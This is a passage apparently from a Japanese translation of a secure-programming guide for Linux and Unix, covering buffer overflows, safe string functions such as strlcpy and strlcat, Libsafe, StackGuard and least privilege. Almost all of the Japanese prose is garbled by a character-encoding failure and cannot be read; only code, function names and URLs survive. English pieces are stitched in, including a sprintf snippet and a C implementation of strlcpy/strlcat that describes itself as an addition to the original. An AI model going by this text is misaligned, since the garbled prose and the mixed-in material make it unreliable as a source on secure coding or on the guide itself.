Aobt@ɂ͎ەKvȂ̂ 1 ēnAgOɍŌ̕
ɂ NIL ZbgĂB͌ʂ܂B strncpy
(3)Astrncat(3)ƂA݂ł̈̎c̑傫œnKv
܂A̎cʂ̌vZ悭ԈႢ܂(ŊԈĂ܂ƁAob
t@I[o[t[UĂ܂܂)Bǂ̊֐dgݏAob
t@I[o[t[ǂȒPɊmFł܂BʂƂ
Aւ֐ł strncpy(3) strcpy(3)ɔׂāAptH[}X
܂B strncpy(3)Rs[̎c̈ NIL Ŗ߂邽߂łB
͂̍Ō̓_ɂċlq̓dq[󂯎܂B
̓_ Kernighan  Ritchie ̑ [Kernighan 1988A
249 ]ɊmɍڂĂA̓ Linux  FreeBSDASolaris  man
ɂڂĂ܂B strcpy  strncpy ւ̕ύX͐\̒ቺ
ӖAĂ̏ꍇ͂낵ȂʂɂȂ܂B

ӁIB strncpy(s1, s2, n)́As2 ̂镔Rs[ꍇɂg
܂Bł n  strlen(s2) 菬lłB̂悤Ɏgꂽ
Astrncpy()g͊{IɃobt@I[o[t[ɑ΂Ėh䂷dg
Ă܂B܂An  s1 ̃obt@KȂ悤ɁA
ƗɏKv܂B܂Â悤ɎgꍇA strncpy()
 n Rs[ NIL t܂B̂ƂAstrncpy()
gvOSł邩ǂ𔻒f̂ɂĂ܂B

sprintf()gĂobt@I[o[t[͖h܂BA
͒ӂKvłBE߂ԈႢȒPɔƂĂ܂܂B sprinf
̐䕶ɂ͂낢ƕ֗Ȏw@(Ƃ΁u%sv)܂B
Đw肷镔ɂ́AIvVtB[h(Ƃ΁Au%10sv)
w肵Ax(Ƃ΁Au%.10sv)wł肵܂B͎
悤Ɍ܂(Ⴂ̓sIh)A܂قȂ܂BtB[h
Ŏw肷ꍇAŏlw肷邾ł́Aobt@I[o[t[h
̂ɂ͂܂𗧂܂BƂ͑ΏƓIɁAxŎw肷@ł͍
lw肵Aw肵͕ϊwɊÂďo͂܂B
܂Aꂪobt@I[o[t[ĥɖ𗧂܂B
AxŎw肷@Ŝ̍ő咷wł邱ƂYȂł
B̕ϊwł͂܂ႤӖɂȂ܂BɁu*vw肷
Aő咷p^œnƂł܂(Ƃ sizeof()̌ʂ)B
ȒPɎ܂̂ŁAł sprintf()gobt@I[o[t[
hƗǂĂ܂B

 char buf[BUFFER_SIZE];
 sprintf(buf, "%*s",  (int)(sizeof(buf)-1), "long-string");  /* WRONG: '*' is a minimum field width, the string is never cut */
 sprintf(buf, "%.*s", (int)(sizeof(buf)-1), "long-string");  /* RIGHT: '.*' is a precision, i.e. a maximum length; the '*' argument must be an int */

 sprintf()͂ƂĂ֗łB͕GȃtH[}bgwł
łBAsprintf()ŊԈႢƂ̂ȒPłBtH[}bgG
ȂAKϊ̑傫ׂĂɂčő̑傫ƂtH[}bg
ɂĂBAxw肷镔 1 ̃p^̑傫
wł܂Bo͂Gȏꍇ́Aulő́vl
͍̂łBlő咷̑gݍ킹ɑ΂āAvO\
󂫂mۂĂȂ΁Aobt@I[o[t[̐Ǝコcꂽ܂
ɂȂĂł傤B܂Asprintf()͏SɏIɁANUL 
ϊɉ܂Bŉ͖̕Y₷Aꂪu1 oCgԈ
(off-by-one)vG[NɂȂ܂B̂悤ɓ삷ƁA
󋵂ɂĂ͒ɂڂɂƂɂȂ邩܂B

܂AL̃R[hŋCɂĂė~̂́Asizeof()Ƃz
̑傫ɂȂ_łBubufvmۂ̃|C^ɂȂ悤ɃR
[hύXƁAusizeof()vׂ̏ĂCȂ΂Ȃ܂(
ȂƁAsizeof ̓|C^̑傫vĂ܂A͂Ă̒l
Ƃď\ȗ̈Ƃ͂܂)B

 

5.2.2. ÓI͓IɊmۂobt@

strncpy ̂悤Ȋ֐́AÓIɊmۂobt@̂ɕ֗łBob
t@́ugɂȂ\ȑ傫vŊmۂĂAmۂ炸
傫̂܂܁AƂjŃvOĂ܂B 1 ̕@
́AKvȑ傫̃obt@𓮓IɊmۂ@łBǂ̕@ZL
eBɖڂȊ֘A܂B

Œ蒷̃obt@gꍇɁAʂZLeB̖肪܂B
͌Œ蒷̃obt@͂₷AƂłB strncpy(3)
 strncat(3)Asnprintf(3)Astrlcpy(3)Astrlcat(3)Ă
BU҂͂ɂݒ肷AƂ̂{IȍlłB
̌ʂ̕񂪐؂̂ĂƁAŏIIɂ͍U҂]񂾏Ԃɂ
܂ (J҂Ӑ}ʂł͂Ȃ)BЂƂƁA񂪂
̏ȕ\Ăꍇ܂BU҂́Aŏ̕Ƀo
bt@𖄂߂̒āA̕܂Ƃ߂Ƃ
ɂ邩܂BŁA̗Ă݂܂B

 E gethostbyname(3)ĂяoR[hvׂĂBɕ
    A hostent->h_name Œ蒷̃obt@ strncpy  snprintf 
    Rs[ĂB strncpy  snprintf gĂ̂ŁAɒ[ɒ
    SChC(FQDN) ĂI[o[t[h܂B
    ĂŏIƎvł傤Bł FQDN ̖
    ؂̂ĂĂ܂ʂɂȂ肩˂܂B͔ɂ܂ƂŁA
    ɉ邩ŏ󋵂ςĂ܂܂B
   
 E strncpy  strncatAsnprintf gꍇvׂĂBt
    @CVXe̎̂\tpXobt@ɃRs[܂
    BɌ̒lMłȂ[Û̂ŁÃRs[vZ
    ʂ֐ɓn̈ꕔƍlĂ݂ĂBňS
    ̂ł傤BŁAU҂pX̐擪ɑʂ́u/v𖄂ߍނ
    zĂ݂ĂB́u/vƂt@Cɑ΂鑀ɂȂ
    Ă܂܂BvOʂ͈SƐMĒlǉȂA
    ̃vO͂Ă܂܂B́AU҂̓ob
    t@̒ɋ߂t@CloāAt@Cǉ邱
    ƂŁAɉ󂵂Ă܂܂(́AIɂĂ
    ܂܂)B
   
 

ÓIɊmۂobt@gɂ́AƂȂĂ錳ɂȂ̈Ɠn
̗̈̒悭lȂ΂܂BāA͂⏈ɏo
Ԃ̌ʂӐ[`FbNĂB

̑ÍAŒ蒷̃obt@g킸ɁA񂷂ׂĂ𓮓IɊm
ۂ@łB̕@ GNU ̃vO~OEKChCŐ
āAvOłǂȑ傫̓͂悤ɂȂ܂(z
Ȃ)BIɕmۂۂɋŃAmۂz
ē삳Ă܂_ɂ̂́A܂ł܂B́Aobt
@I[o[t[N̂ł͂ȂAƋCɂĂ镔ł͂ȂAv
Ôǂ̏Ŏg؂Ă܂܂Bł̓
ǂɂmۂł܂B܂AIȊmۂ̓ǂpłȂ
ꂪ܂̂ŁA_Iɂ̃vÔɏ\ȉz
ƂĂAI[o[ē삵Ă܂\͏\
܂BɁAvO̓I[o[Ă܂OɁA炭
ʂ̉zg܂BȂƂĂuXbVOvɊׂ
BXbVONƁARs[^̓fBXNƃԂł̏
󂯓nɂׂĂ̎Ԃ₵Ă܂܂(YIȏ邩)
B̓T[rXۍUƓe^܂B͂̑傫ɑ΂ė
Ȃ݂ƌʂ܂BʃvOœIɕm
ۂȂAgʂĂtFCEZ[tɂȂ悤ɐ݌v
΂Ȃ܂B

 

5.2.3. strlcpy  strlcat

̕@́AOpenBSD ō̗pĂ strlcpy(3)  strlcat(3)łB
 Miller  de Raadt[Miller 1999]쐬܂B͋@\
ŏɗ}AÓIȑ傫obt@̗pĂ܂BC ̕
Rs[AÂɈقȂC^tF[X̗pĂ܂(G[N
ɂ)B̊֐̃\[XƃhLǵA ftp://ftp.openbsd.org
/pub/OpenBSD/src/lib/libc/string/strlcpy.3 ŗpłAV BSD X^
C̃I[v\[XCZX̗pĂ܂B

܂vg^Cv܂B

size_t strlcpy (char *dst, const char *src, size_t size);           
size_t strlcat (char *dst, const char *src, size_t size);           

strlcpy  strlcat p^ŃRs[̃obt@ۂ̑傫Ŏw
܂(Rs[镶̍őlł͂܂)B܂Aʂ NIL ŏI[
邱Ƃۏ؂Ă܂(傫 0 傫)BYĂȂȂ
́A傫ɂ NIL p 1 oCgĂKv邱ƂłB

strlcpy ́ANUL ŏI[̕񂩂A size - 1 ̕Rs[
ANIL ŏI[܂B strlcat ́ANIL ŏI[Ă镶𖖔ɒǉ
܂BςĂ size - strlen(dst) - 1 oCgǉANIL 
I[܂B

strlcpy(3)  strlcat(3)́AĂ Unix CNȃVXeɃftH
gł̓CXg[܂Bꂪ_ƌΌ_łB OpenBSD ł
A<string.h> ̈ꕔɂȂĂ܂B͂ł͂܂B
͏Ȋ֐ŁAvÕ\[X̒ɓꂽ(ȂƂIv
VƂ)AƗpbP[WƂēǂݍ߂܂BP[X
 autoconf gĎ̂\łBɑ̃vOł
̊֐g΁ALinux fBXgr[V⑼ Unix CNȃV
Xe̕W\̈ꕔƂȂ̂͂Ȃł傤B܂ŋ߂ɂȂ
āÅ֐́uglibvCuɎ荞܂܂(pb`
Ă̂悤ɂȂ܂)BāAŋ߂̃o[W glib g
pł܂B glib ł͂̊֐ g_strlcpy  g_strlcat ƂȂ
(strlcpy  strlcat ł͂܂)Aglib Cu̖Kɉ
`ɂȂĂ܂B

܂ strlcat(3) ́A 0  NIL ̕(w肵
̒)ɂȂꍇɎ኱@ςĂ܂B OpenBSD ł́A
 0 ȂΏ̒̕ 0 Ƃ݂Ȃ܂B܂ 0 ȊO
NIL ̕()ɖꍇ́A͎̒w肵
̂ƓƂ݂Ȃ܂BKɂāAւ NIL ̑gݍ
OꂵĂ܂BɂAȂƂ Solaris (_ł)̋K
Ă܂BŔAIWĩhLgɂLq
łB Todd Miller ƘbAOpenBSD ̕@ƍӂ
 (Solaris ȂƂɂ)BR͒PłBǂȏł
ĂAstrlcat  strlcpy ͏悪w肵̑傫zĂ邩
ǂ𒲂ׂǂ̂ɂ炸AĂȂłB
悤ȕ@ƂƁAcore _vĂ܂(͈͊OɃANZX
)An[hEFAɈe^邩܂(}bvh I/O 
ʂ)B܂肱łB

  a = strlcat ("Y", "123", 0);                                      

Ԃl 3(0+3=3)łASolaris  4 ɂȂ܂B͏
u傫v̒z𐳂ĂȂ߂łBA
 0 ͏ NIL ꍇ悤ɂE߂܂
B glib ̏̃o[Wł́Ȃ_BāA OpenBSD ̕
@p\łB
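
The strlcpy/strlcat interface described above, written out with the OpenBSD edge-case rule, as an added example that is not part of the original document or of OpenBSD's libc. The names are prefixed my_ to avoid clashing with a system copy; the return-value convention (the length the call tried to create, so ret >= size means truncation) and the size-0 behaviour that makes strlcat("Y", "123", 0) return 3 are exactly the ones the text states.

```c
#include <stdio.h>
#include <string.h>

/* Copies as much of src as fits in the size-byte buffer dst, always leaves
 * dst NUL-terminated when size > 0, and returns strlen(src): the length of
 * the string it tried to create.  A return value >= size means truncation. */
size_t my_strlcpy(char *dst, const char *src, size_t size)
{
    size_t srclen = strlen(src);
    if (size != 0) {
        size_t n = srclen < size - 1 ? srclen : size - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return srclen;
}

/* Appends src to the string in the size-byte buffer dst and returns
 * strlen(dst) + strlen(src), the length it tried to create.  Edge cases
 * follow the OpenBSD rule: with size 0 the existing dst counts as empty,
 * and if no NUL is found within the first size bytes its length is taken
 * to be size.  Either way nothing beyond size bytes of dst is read or
 * written, so the call can never run off the end of a buffer. */
size_t my_strlcat(char *dst, const char *src, size_t size)
{
    size_t dlen = 0;
    while (dlen < size && dst[dlen] != '\0') dlen++;
    size_t srclen = strlen(src);
    if (dlen == size)                   /* no room, not even for the NUL */
        return size + srclen;
    size_t room = size - dlen - 1;
    size_t n = srclen < room ? srclen : room;
    memcpy(dst + dlen, src, n);
    dst[dlen + n] = '\0';
    return dlen + srclen;
}

/* Caller idiom: detect truncation from the return value rather than
 * discovering it later from a silently shortened string. */
int copy_or_fail(char *dst, size_t size, const char *src)
{
    return my_strlcpy(dst, src, size) < size;   /* 1 = whole string fitted */
}

int main(void)
{
    char buf[8];                                /* constructed sample buffer */
    size_t r = my_strlcpy(buf, "0123456789", sizeof buf);
    printf("strlcpy returned %zu (>= %zu, truncated), buf=\"%s\"\n", r, sizeof buf, buf);
    char y[4] = "Y";
    printf("strlcat(\"Y\", \"123\", 0) returned %zu\n", my_strlcat(y, "123", 0));
    return 0;
}
```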

 

5.2.4. libmib

C p̃c[Zbgɂ́AIɕ𓮓ImۂĂ̂
B Forrest J. Cavalier III ́ulibmib allocated string
functionsvŁAhttp://www.mibsoftware.com/libmib/astring ł
Blibmib  2 ނAulibmib-openv X11 ƎƎ̃CZX
ɂĂ܂̂ŁA炩ɃI[v\[XłB̃CZX́A
CĔzzF߂Ă܂AĔzzɂ͕ʂ̖OIȂ΂
񂵁AuSɃeXgĂȂvƊJ҂͋LڂĂ܂B
libmib-mature ɓȂA\݂ɔp܂Bh
Lg̓I[v\[Xł͂܂񂪁ARɗpł܂B

 

5.2.5. C++ std::string NX

C++ ŊJĺAɑgݍ܂Ă std::string NX𗘗p
ł܂B̃NX͓Iȕ@̗pĂāAKvɉċL̈
₵Ă܂BӂȂƂȂ̂́ANX̃f[^u
char *vɒu (Ƃ data()  c_str()g)AĂ
obt@I[o[t[̖肪\ʉ_łBāA\bh
gpꍇɂ͒ӂKvɂȂ܂B c_str()͏ NIL ŏI[
Ԃ܂Adata()̏ꍇ͂ǂȂ邩킩܂(łA
Ƃǂ NIL ŏI[܂)B data()̎gp邩AǂĂg
΂ȂȂȂÃtH[}bg𓖂ĂɂȂłB

̕񃉃CugĂJ҂lɂ񂢂܂Â
ȃCúȂ̃Cu⎩̕񃉃CuƑgݍ
킹ɂȂĂ܂B̂悤ȃCugꍇɂ́AƂ킯ӂ
ĂB̕NX̑́AIɃNXuchar *v^
CvɕϊĂ܂[`Ă܂B̌ʁAmȂɃo
bt@I[o[t[̐Ǝコɂ͂܂Ă\܂B

 

5.2.6. Libsafe

(Lucent Technologies )Arash Baratloo  Timothy TsaiANavjot
Singh ALibsafe J܂B̃CúAX^bNjU
ɎアƂŒmĂ郉Cu֐̂Ƀbp킹܂B
̃bp(J҂́Au~hEFAv̈ƌĂł܂)́AIɃ
[hPȂ郉CuŁAstrcpy(3)̂悤 C ̃Cu֐C
o[WĂ܂B̏Cς݂̃o[ẂAIWi
̋@\Ă܂AӖłǂȃobt@I[o[t[
݂̃X^bNEt[̒ɕ߂܂B̐\͂ł́ACu
̃I[owbh͂ƂĂƂĂ܂B Libsafe ̃hLgƃ\
[XR[h http://www.bell-labs.com/org/11356/libsafe.html 擾
܂B Libsafe ̃\[XR[h̓I[v\[X LGPL CZXɊS
ɏĂāALinux fBXgr[^͗pɊ֐S܂
B

Libsafe ̉i͖͑ɗ悤Ɏv܂Bm Linux fBXg
r[^ Libsafe ̗̍pǂẢ@͂̑̐l
lɌɉ܂BƂ΁ALinux fBXgr[V
Mandrake(o[W 7.1) ͍̗pĂ܂B\tgEFAJ҂ɂƂĂ
Libsafe ͎̍񂾖ĥɕ֗Ȏdg݂łA{Ƀobt@I
[o[t[h킯ł͂܂BR[hJĂ鎞ɁA
Libsafe ɗׂł͂ȂR܂B

 E Libsafe ́A炩Ƀobt@I[o[t[̖ĂAm
    ̂킸Ȋ֐h䂵܂BĂ鎞_ł́Ahł
    ֐̃XǵÃhLgŖĂƂ֐̃
    Xg肩ȂZȂĂ܂B܂AȂg(Ƃ
    while [v)obt@I[o[t[NR[h͖h䂵Ă
    B
   
 E libsafe fBXgr[VɓĂƂĂACXg[
    @ɂėpɍo܂BhLgł LD_PRELOAD 
    肵 libsafe ̖hLɂ悤ɐĂ܂A̓[
    Ůϐ̐ݒ͂Ƃɂ܂BŃ[U
    svOɑ΂h͖ɂȂĂ܂܂B
   
 E Libsafe ́A^[AhXX^bNɂobt@I[o[t
    [ɑ΂Ăʂ܂Bq[vvVW[Et[ɂ
    ̑̕ϐł́A炸I[o[Ă܂܂By󒐁Fv
    VW[Et[Ƃ́Ao^ς݃WX^ƃ[JϐĂ
    X^bNEZOgłBactivation record Ƃ܂z
   
 E ɂRs[^EVXeׂĂ libsafe(͎
    )płƒfłȂÃvO libsafe 
    Ŗh䂵Ȃ΂܂B
   
 E LibSafe ͓o^ς݂̃t[E|C^X^bNEt[ꂼ
    ̐擪ɂ邱Ƃ肵Ă悤Ɍ܂B͏ɐ^Ƃ͌
    ܂BRpC(gcc ̂悤)͍œKĂ܂܂BɁu
    -fomit-frame-pointervƂIvV libsafe ɕKvƎv
    폜Ă܂܂B܂Alibsafe ܂ȂvO
    邩Ȃ̂łB 
   
libsafe ̊J҂gA\tgEFAJ҂ libsafe ɗ
ĂĂ͂ȂƂmĂ܂Bނɂ΁A

   
    obt@I[o[t[Uɑ΂œḰAvǑׂ̏C
    ł邱Ƃ͎m̎łBAׂvOC
    ɂ́AvOɌׂ邱ƂmKv܂B libsafe 
    ̑̃ZLeB΍gp{̃bǵA܂Ǝコm
    ĂȂvOA̍UɔƂ_ɂ܂B
   
 

5.2.7. ̑̃Cu

glib(glibc ł͂Ȃ)Cu͍LpłI[v\[X̃Cu
 C vO}ɑ΂Ă֗̕Ȋ֐񋟂Ă܂BƂ
AGTK+  GNOME ͗҂Ƃ glib gĂ܂BȑOɂwE܂
Aglib o[W 1.3.2 ɂ͎񋟂pb` g_strlcpy() 
g_strlcat()ɓKpĂ܂B̃o[WLp΁AڐA
̍̊֐̗pƊȒPɂȂ͂łBł́Aglib 
Ců֐obt@I[o[t[hۂ͂͌̕_Â
܂BAglib ֐͎̑IɃmۂAs
肵āA킩炸ɓȂȂ܂(Ƃ΁Aɕʂ̂Ƃ
Ƃ邽߂)BʓIɁAglib ֐̑啔́AS߂vO
ł͗płȂꍇ܂B GNOME ̃KChCł
g_strdup_printf()̂悤Ȋ֐̎gp𐄏Ă܂BvO
ONꍇAɃNbVĂ܂ȂȂAgpĂ
܂܂Bꂪ󂯓ȂÂ悤ȃ[`gp
̂́AK؂ł͂܂B

 

5.3. C  C++ ł̃RpCɂ

܂ϓ_͂낤Ƃ̂ɁÄ̋E`FbN
RpCɍŝ܂([Sitaker 1999] ̃XgQƂĂ
)BłA낢Ȗhi 1 ƂĎgpȂÂ
ȃc[͔ɗLłBA̎@Ŗh䂷̂͌i
Ƃ͂܂BRƂďȂƂ 2 ͋܂B܂Â悤
ȃc[̓obt@I[o[t[ɑ΂ĕKvȖḧꕔs܂
(āuȁvhsƂƁAʏ 12  30 {xȂ
)BC  C++ ͂obt@I[o[t[hi킹
܂BɁAI[v\[XłvO͂ǂȃc[găR
pC邩߂Ă킯ł͂Ȃ_łBVXeɂĂ
ftHǵuʂ́vRpCgƁAZLeB̎_炷
܂B

ɗLȃc[ 1 ɁuStackGuardv܂B́AWI
GNU C RpC̏CłłB StackGuard ́uK[hv邽߂̒l(uJ
iA(canary)vƌĂт܂)^[AhXĂOɑ}
삵܂Bobt@I[o[t[ă^[AhX
ƁAJiA̒l(炭)ύXAۂɎgpOɃVXe
o܂B͔ɗLȂ̂łA^[AhXȊO̒l(
pĂVXeUł܂)obt@I[o[t[ɂ
Ώł܂B StackGuard āAJiA𑼂̃f[^ɑ΂Ă
g悤ɂ̂AuPointGuardvłB PointGuard ͎Iɂ
l(ƂΊ֐̃|C^⃍OWvEobt@) ی삵܂B
̕ϐ PointGuard gĕی삷ꍇAvO}݂̉Kv
Ȃ܂(vO}͂ǂ̃f[^JiAŕی삵Ȃ΂Ȃ̂
fȂ΂܂)B͗LȔʁA{ی삷ׂȂ̂ɕKv
ȂAƂ蔻fĂ܂AƂȒPɕیȂĂ܂ꍇl
܂B StackGuard  PointGuardA܂ƓlȂ̂ɂĂ̏
ׂ Cowan [1999] QƂĂBy󒐁Fނ̃JiÁAYz
_Yf̑_Ԃumv邽߂ɎĂ܂z

Ɗ֘AāALinux ̃J[lCAX^bNEZOgł̃v
O̎s֎~Ă܂@܂Bsɂ̓pb`K
vł (Solar Designer ̃pb`Ɋ܂܂Ă܂B http://
www.openwall.com/linux/ Ă)B̃hLgĂ鎞
_ł́A܂J[lɎ荞܂Ă܂BZpIȗR 1 ɁAv
قǂ̌ʂłȂ_܂BU҂́AΏۂɂĂvO
Ɋɑ݂Ă鑼́uʔȁvꏊ (Cuq[v̈A
X^eBbNȃf[^EZOg̈擙)ĂяoĂ܂łB܂
Linux ̓X^bN̈ŃvOsꍇ܂BƂāAV
Oi GCC ́ug|v̎ꍇłB Solar Designer 
̃pb`ł̂悤ȃP[XɂΉł܂Aꂪpb`𕡎GȂ
Ă錴łBlIɂ Linux {ɑgݍ܂Ă悢Ǝv܂
BƂ̂ɂĂԂ񂩂łUȂ܂A̍U
̂镔͖hł邩łB Linus Torvalds l
悤ɁÃpb`ڂقǂ܂܂Ȗh䂪łȂArIȒP
ɂ̖h̗ƂłAƂ_ɂĂ͎ӌłB
Linus Torvalds ̃pb`̗pȂRɂẮA http://
lwn.net/980806/a/linus-noexec.html ĂBy󒐁Fg|
(trampoline)Ƃ́AvOsĂŒɃvOgɂ
A݂ɓƗȃIuWFNgER[hw܂z

vɁA܂vÔ̂Ńobt@I[o[t[h悤ɊJ
̂؂łB̂悤ɊJɁAStackGuard ̂悤ȃc[
eNjbNgāAɈSuĂׂłB\[XR[h
obt@I[o[t[ǂo邾ǂoA StackGuard ͂
Ɍʂ𔭊܂BƂ̂ StackGuard ĥ߂ɌĂ΂悤
uvIȎ_v炷Ƃł邩łB

 

5.4. ̑̌

obt@I[o[t[́APerl  PythonAJavaAAda95 ̂悤ȑ̃v
O~OłȂɂȂ܂B܂ƂAgĂ鑼
̃vO~O(AZu͏)̂قƂǂׂẮAobt@
I[o[t[h䂵Ă܂B C  C++ ȊǑgƂĂA
񂷂ׂĂ̖ł킯ł͂܂Bڂ́A_
Section 7.3 ɂ NIL ̈QƂĂB܂ꂪ񋟂
Ă{Iȋ@\(Ƃ΃^CECu)płŁA
̋@\Sł邱Ƃۏ؂ƂcĂ܂B̂
Ȗ͂ɂAS߂vOJsꍇ́A
̌̎gp^ɍlāAobt@I[o[t[hłB

 

Chapter 6. vÕC^tF[XƓ\Ƃ邱

                                    Nďǂ̖łтB̗ 
                                    𐧂ȂlB                   
                                                                       
                                               񐹏⼌ 25  28 
 

6.1. SȃvO邽߂ɂ́A\tgEFAEGWjAǑ
ɏ]

Saltzer [1974]  Saltzer and Schroeder [1975]ł́A݌vɓĈS
ی삷̂ɁAL̂悤Ȍ܂Ƃ߂Ă܂B͍ȂLvł
B

 E ł邾ȂB[UvOɂ͂ł邾
    Ȃ悤ɂĂB΁AANVfgG[AU
    ҂ɂ_[Wŏɗ}܂B܂A邱Ƃœ
    vOԑ݂̉e\Ȍ}̂ŁAӐ}
    svŕsK؂ȓ𗘗pȂȂ܂B̃ACfBA̓vO
    ɂ̗pł܂BvO̍ŏ̕ɂKvƂȂ
    ĂB̏ڍׂ́ASection 6.4 ĂB
   
 E dg݂PɁBhVXe͏Pɐ݌v܂Bނɂ
    ΁Au\tgEFAsɒAn[hEFA𒲍āA
    h@\̎eNjbNKvɂȂ肵܂BeNjbN
    ܂ɂ́APȐ݌v{ɂȂ܂vu
    KISSv̌(ukeep it simple, stupidv(AZƂ))ƕ\
    ꍇ܂B
   
 E I[vȐ݌vBh䂷dǵ݂AU҂̎dg݂̒m
    ȂƂɗĂ͂܂B̂AJꂽdg݂ŁApX
    [h閧̂悤ɔrIȂ (ĊȒPɕς)Ŕ
    悤ɂĂBI[vȐ݌v́AL͈͂ȌJꂽ
    \ŁA邱ƂŃ[ŨVXe̗pK؂Ȃ̂
    [ł܂BɌāALzzVXe𖧂Ƀ
    eiX悤Ƃ̂́AIł͂܂BfRpC(tR
    pC)n[hEFA󂵂Ă܂ƂŁAƌԂɂu
    閧v΂Ă܂\܂B Bruce Schneier ́A̐
    GWjAȂ΁AuZLeBɊւ邷ׂẴR[h́AI[
    v\[XłǂƎ咣vƂĂ܂B܂
    ALO҂烌r[󂯂AŖƂȂC
    邱ƂؖĂ܂[Schneier 1999]B
   
 E Sɒs. ׂẴANZX`FbNȂ΂܂
    B`FbNdǵ݂A󂳂ȂꏊɒuĂBƂ
    ANCAgET[ofł΁AT[ołׂẴANZX
    `FbNKv܂B̓[UNCAgV
    Â̂Cł邩łB́AChapter 4
     Section 6.2 ɂY܂B
   
 E tFCEZ[tftHgƂ(Ƃ΁Ap[~bVp
    @)BftHgł̓T[rXۂĂBh@\͂ǂ̃A
    NZXĂ̂A󋵂FĂȂ΂܂Bڂ
    ́ASection 6.7  Section 6.9 ĂB
   
 E WȂBΏۂւ̃ANZXɓāȀ
    ̂zIłB΁AhVXejĂA
    ȃANZX悤ɂ͂ȂȂłB
   
 E ʂdg݂͂ł邾pȂ. ʂdg݂̐Ƃ̗px
    ŏɂĂ(Ƃ΁A/tmp  /var/tmp ̗p)Bdg
    ʉƁA̗̒Ŋ댯ȌoHɂȂĂ܂
    A\Ȃݍp肷鋰ꂪ܂Bڂ́A 
    Section 6.10 ĂB
   
 E CŎ󂯓邩AȒPɎg邩Bq[}EC^tF[
    X́A[U퉽CȂh̎dg݂g悤ɁAg
    ݌vȂ΂܂BZLeB̎dg݂[Uv`
    h̖ڕWƃ}b`ȂA߂͌ł傤B
   
 

ZLeBɂĂ̐݌v̌낢ƖԗĂ鎑 Peter
Neumann's CHATS Principles <http://www.csl.sri.com/neumann/chats2.html>
ɂ܂B 

 

6.2. C^tF[XS

C^tF[X́Ał菬(ȂVv)(Kv
@\)AėOȂ̃C^tF[Xg悤ɂKv
BMpł͂͂قƂǂȂƎvĂB[Uf[
^ɐ邱ƂĂB

 

6.3. f[^Ɛ؂藣

T|[gǂȃt@Cɑ΂ĂA(O痈)f[^Ƃs
vOSɕĐ݌vĂBAvP[Vf[^
r[A[́AOō쐬t@C\ꍇɂ悭g
ŁA炪t@CvO(uXNvgvƂu}Nvƌ
܂)ƂĎ󂯕tȂ悤ɂĂBł댯Ȃ̂́As}
NłB́AAvP[V[hAf[^ŏɕ\
肵ɓ삵Ă܂܂BZLeB̊ϓ_炷ƁA͍
N̂҂Ă悤Ȃ̂łB

ꂽƂ납_E[h@\vOłƃT|[g
΂ȂȂ(Ƃ΁ÃVXeɎ邽)A}N̓
ɕKȂ΂܂(uTh{bNXvƌ
ł܂)BoATh{bNX{ɐ͍̂łB
ہAPƂōL͂ɗpꂽTh{bNX̒ŁAĎOɓnĔj
̂͋Lɂ܂(AJava ܂߂)B\ȂAȂ
ƂvOƗt@CɎ߂ĂB΁ÃT
h{bNXɌ_肻ꂪCȂĂAȒPɃubNł
łB܂ƗɂĂƂŁAR[h̍ėpeՂɂȂA𗧂
ɐg߂ŗpł܂B

 

6.4. ŏ

ȑOɂ悤ɁAʓIȌ́AvOɂ͏ɕKvƂȂ
Œɂ^ȂƂł(ł邾Ȃ)B
΂̃vOĂA_[W͍L܂Błɒ[ȗ́AP
ɈSKvƂȂvO܂ȂƂłBł΁A
ׂłBƂ΁A\ȂvO setuid  setgid 
ȂłB̈ʃvOɂāAǗ҂ɂ͓OɃO
Ƃ悤Ɉ˗ĂB

Linux  Unix ɂāA܂vZX̓肷̂́ÃvZX
id ̑gݍ킹łBvZXꂼɂ́A[UO[v҂̎A
Aۑ id ܂B (Â Unix ɂ́uۑvid Ȃ̂
)B Linux ɂ͓ʂȊg@\ƂāAt@CVXeƂ͓Ɨ uid
 gid AvZXꂼɗpӂĂ܂B̒l𑀍삷̂
Aŏɗ}ŌƂł܂񂵁Aŏɗ}
@܂(LŘ_܂)B chroot(2)płAvO
猩t@Cŏɂł܂B Linux  Unix ɂ́Aɂ
߂l܂BƂ΁A POSIX PCpreB(Linux
2.2 ȏŃT|[gA Unix CNȃVXełT|[gĂ
̂܂)ɓ܂B

 

6.4.1. ŏ

łʓIȂ́Aō̓fɍŏɂ
@łBɁAł邾 root ̓͔̂ĂB
̂킸ȃt@CQɃANZXKv邾ŁAvO 
setuid root ȂłB@\ɓƗ[UO[vAJ
Eg̍쐬ĂB

悭s@́AʂȃO[v쐬At@C̃O[ṽI[i[
̃O[vɕύX@܂BăvÕO[v 
setgid ܂BłȂ setuid  setgid łB
ĂāAO[ṽo[ɂ͂قƂǌF߂Ȃ悤ɂ܂
(Ƀt@C̃p[~bVύX錠F߂Ȃ)B

́AQ[\tg̃nCXRAL^ꍇɂ悭gĂ@
BQ[͕ games  setgid āAXRAt@C games O[v
LĂ܂BăvÔݒt@ĆAʂ̃[U(root
)LĂ̂ʂłBĂ΁AQ[ʂĐN҂
ĂĂAnCXRA邱Ƃ͂łƂĂAQ[̎s`
ݒt@Cɂ͎t܂B҂͏dłBU҂Q[̎
s`ݒt@C(ǂ̎s`𓮂𐧌䂵Ă)ύXł
ȂAQ[𓮂Ă郆[URg[ł邩Ȃ
B

VO[v邾ł͕s\ȏꍇ́AṼ[U(ۂɓ
Ȗ)쐬A֘A郊\[XǗĂB̓T^I
ȗ Web T[ołBWeb T[o͓ʂȃ[U(unobodyv)Őݒ肵Ă
̂ŁÃ[UƗĂ܂BہAWeb T[o͋
邱Ƃ܂BWeb T[o͕ʂ͋N root ̓Kv
܂(80 ԃ|[g𗘗p邩ł)ANĂ܂ƂׂĂ̓
OāAunobodyvƂ[Uœ܂BJԂ܂Aʏ퉼̃[
U͍ŏɓvOLĂȂ̂ŁAAJEgɐ荞
AvÔύXł܂BʓIɂ́A삵Ă Web T[o
ɐNĂAꂾŃVXeׂẴZLeB͐N܂B

f[^x[XVXe𗘗pĂȂ(܂ÃNGEC^tF[
XĂяoĂ)ÃAvP[V𗘗pĂf[^x[XE
[ǓɁAĂBƂ΁A[U`ق̂
̃NGgANZXKvȃ[Uɑ΂āAVXẽX
gAhEvVWׂĂɃANZX悤ȂƂ͂ȂłB
sł̂́AXgAhEvVWłBĂ΁AƂN
Cӂ̕NGɖꍞ񂾂ƂĂA_[W͌
͈͂Ŏ܂܂BڕWI SQL NGNCAg̃f[^Ƃ
񋟂Ȃ΂ȂȂȂA̓𐧌悤ɃbpĂ
(Ƃ΁Asp_sqlexec ̂悤)B (f[^x[XɂẴAhoCX
ĂꂽASPI Labs Ɋӂ܂)B 

